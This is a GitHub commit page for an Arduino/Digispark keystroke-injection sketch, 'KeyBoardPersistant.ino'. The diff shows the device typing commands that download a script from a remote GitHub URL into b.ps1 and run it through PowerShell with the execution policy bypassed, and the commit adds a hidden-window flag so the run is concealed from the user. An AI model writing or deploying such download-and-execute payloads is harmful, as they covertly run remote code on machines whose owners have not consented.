Skip to content

Commit

Permalink
Update KeyBoardPersistant.ino
Browse files Browse the repository at this point in the history
  • Loading branch information
mbauer599 authored Apr 13, 2017
1 parent 2d71189 commit 4f009cc
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion KeyBoardPersistant/KeyBoardPersistant.ino
Original file line number Diff line number Diff line change
Expand Up @@ -22,7 +22,7 @@ void setup()
DigiKeyboard.println("echo (wget 'https://raw.githubusercontent.com/mbauer599/rubberduckyrun/master/run').content > b.ps1");
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(50);
DigiKeyboard.println("powershell -ExecutionPolicy ByPass -File b.ps1");
DigiKeyboard.println("powershell -windowstyle hidden -ExecutionPolicy ByPass -File b.ps1");
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.println("exit");
DigiKeyboard.sendKeyStroke(KEY_ENTER);
Expand Down

0 comments on commit 4f009cc

Please sign in to comment.